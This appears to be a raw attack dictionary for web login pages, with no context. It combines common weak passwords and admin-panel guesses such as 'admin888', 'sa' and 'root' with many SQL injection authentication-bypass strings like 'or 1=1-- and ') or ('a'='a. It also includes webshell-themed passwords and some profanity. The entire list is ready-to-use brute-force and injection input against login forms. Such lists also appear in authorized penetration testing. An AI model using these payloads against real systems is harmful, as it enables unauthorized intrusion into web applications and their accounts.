000000
00000000
111111
11111111
123123
123321
12345
123456
123456789
1234567890
123asd
123go
1'or'1'='1
54321
55555
654321
6kadmin
88888
888888
88888888
888999
aaaaa
aaaaaa
aaaaaaaa
ABC123
abcdef
abcdefg
ad88
ad888
ad8888
admin
admin
admin12
admin123
admin8
admin88
admin888
admin8888
admins
adminx
adminxxx
a'or' 1=1--
a'or'1=1--
asd123
asp
aspadmin
aspxadmin
axiao
baidu
baiduadmin
baidusb
Baike
cmdshell
cms
fuck
fucker
fuckhack
fuckhacker
fuckit
FuckYou
ghost
h4ck
h4ck3r
hack
hack520
hacker
hackersb
hackqingshu
hacksb
huaidan
iamnotadmin
iloveshell
jspadmin
kill
login
love
loveshell
mama
mama520
nc
noadmin
nohack
noid
"or"="
'or''='
'or'='1'
"or 1=1--
"or1=1--
'or 1=1
'or 1=1--
'or 1=1/*
'or' '1'='1'
'or1=1--
or 1=1--
or1=1--
"or "a"="a
"or"="a'='a
') or ('a'='a
'.).or.('.a.'='.a
'or"="a'='a
'or.'a.'='a
or 'a'='a'
"or=or"
''or'='or'
'or''=''or''='
'or'='or'
'or'='or'
password
phpadmin
qwerty
root
sa
sysadmin
test
test123
username
webadmin
webadmin2
WebShell
welcome
windows
xxxxx
zzzzzz
